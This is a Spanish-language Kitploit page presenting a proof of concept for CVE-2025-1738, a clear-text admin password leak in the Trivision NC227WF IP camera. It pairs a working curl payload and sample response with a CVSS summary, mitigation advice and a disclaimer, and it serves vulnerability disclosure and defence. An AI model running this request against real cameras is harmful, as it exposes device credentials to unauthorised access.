Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-1738 — Descubrimiento de día cero CVE-2025-1738 | Kitploit
Herramientas/GitHubGitHub/n0n4m3x41/cve-2025-1738
Seguridad IoTAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónSeguridad de Hardware e IoTAprendizaje y Educación
GitHubn0n4m3x41/cve-2025-1738

CVE-2025-1738

Descubrimiento de día cero CVE-2025-1738

Ver Repositorio
3hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-1738 - Cámara Trivision NC227WF PoC

📋 Resumen

Tras la divulgación responsable, se asignaron dos CVEs oficiales.

CVECVSS v3.1PuntuaciónCWETipo
CVE-2025-1738AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N6.2CWE-598Exposición de contraseña en texto claro

🔍 CVE-2025-1738 — Exposición de contraseña en texto claro (CWE-598)

Descripción

Cualquier usuario local puede recuperar la contraseña de administrador en texto plano sin necesidad de autenticación previa.

  • Vector de ataque: Local (AV:L)
  • Puntuación CVSS: 6.2
  • CWE: CWE-598 (Uso del método de solicitud GET con cadenas de consulta sensibles)

Payload

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp

Ejemplo de respuesta

image
root@kitploit:~
...password=unguessable123!...

La contraseña de administrador se devuelve en texto claro dentro del cuerpo de la respuesta.


🛡️ Mitigación

  • Actualice el firmware si Trivision ha publicado una versión corregida.
  • Aísle la cámara en una VLAN dedicada sin acceso externo.
  • Proteja con cortafuegos el puerto de administración de la cámara de segmentos de red no confiables.
  • Cambie las credenciales predeterminadas y rote las contraseñas periódicamente.
  • Monitoree el acceso inesperado a activex_pal.asp y mblogin.asp.

📚 Referencias

  • NVD — CVE-2025-1738
  • NVD — CVE-2025-1739

⚖️ Aviso legal

Este repositorio es solo para investigación de seguridad educativa y autorizada. Los autores no se hacen responsables de ningún uso indebido. Siempre obtenga permiso explícito antes de probar cualquier dispositivo.

Descargar herramienta